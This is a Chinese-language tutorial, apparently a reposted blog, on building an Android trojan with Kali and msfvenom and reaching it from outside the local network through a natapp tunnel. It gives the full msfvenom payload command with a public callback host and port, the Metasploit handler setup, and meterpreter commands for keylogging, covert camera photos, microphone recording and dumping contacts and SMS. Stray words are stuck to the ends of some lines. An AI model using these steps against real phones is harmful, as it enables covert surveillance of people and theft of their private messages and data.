使用kali(外網)生成木馬入侵安卓手機

常常使用metsploit的同窗可能會有疑問,爲啥我只能在同一局域網裏面滲透主機呢?......html

這主要是由於你的身處於內網之中。不知道你們對內網和外網的理解是什麼?這裏我給你們普及一下吧!linux

什麼是內網?內網接入方式:上網的計算機獲得的IP地址是Inetnet上的保留地址,保留地址有以下3種形式:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x內網的計算機以NAT(網絡地址轉換)協議,經過一個公共的網關訪問Internet。內網的計算機可Internet上的其餘計算機發送鏈接請求,但Internet上其餘的計算機沒法向內網的計算機發送鏈接請求。android

什麼是外網(也稱爲公網)?使用ADSL的用戶,若是隻有一個用戶一臺計算機在使用此寬帶,沒有使用路由功能,而是用撥號軟件直接撥號上網的,這種狀況下,該用戶目前所處的網絡爲外網,外網的用戶都擁有一個屬於本身的獨立IP地址.公網的計算機和Internet上的其餘計算機可隨意互相訪問。web

如何判斷你是網絡是內網仍是外網呢?輸入WIN+R進去MS-DOS命令行裏面,輸入:ipconfig看一下本身的ip:若是你的IP地址屬於保留地址(保留地址開頭爲:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x)那麼你的計算機就是運行在局域網內。服務器

使用natapp服務/內網穿透工具Ngrok 。網絡

這裏以natapp進行實驗app

你在natapp官網註冊好後得到一條免費隧道,添加tcp通道,端口號自定,例如2018,ip填127.0.0.1tcp

在linux下首先下載natapp的客戶端,而後再命令行內啓動natapp     語句:   ./natapp -authtoken=************       後面的星號換成本身的口令工具

(若是提示權限不夠  chmod a+x natapp )命令行

啓動成功後能夠看到下面圖片

ping 一下第一個圈內的服務器 獲得ip地址120.3.51.1    後面位端口號 34611

開始生成外網小馬

msfvenom -p android/meterpreter/reverse_tcp LHOST=120.3.51.1 LPORT=34611 R > android_backdoor.apk

必定要注意ip和端口填服務器的

將apk文件安裝到安卓手機上。

啓動  msfconsole

依次輸入下面的命令

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 127.0.0.1

set lport 2018

監聽127.0.0.1:2018                        (內網穿透至關於先將數據發給服務器,而後由服務器發給內網中的咱們 )

啓動run

用你的電話卡流量試試看打開app

keyscan_start:開始鍵盤記錄
keyscan_dump:下載鍵盤記錄
keyscan_stop:結束鍵盤記錄

record_mic:錄製聲音(若是目標主機上有話筒的話)
webcam_chat:查看攝像頭接口

webcam_stream  //開啓攝像頭

webcam_list:查看攝像頭列表
webcam_snap //隱祕拍照功能

webcam_snap 隱祕拍照功能 -i 1 或者2是開啓前置攝像頭和後置攝像頭的

run vnc:開啓遠程桌面
dump_contacts //導出電話號碼
dump_sms  //導出信息
能夠輸入?查看更多命令

轉載:https://www.cnblogs.com/jjj-fly/p/7228785.html

https://www.freebuf.com/sectool/162046.html

相關文章
相關標籤/搜索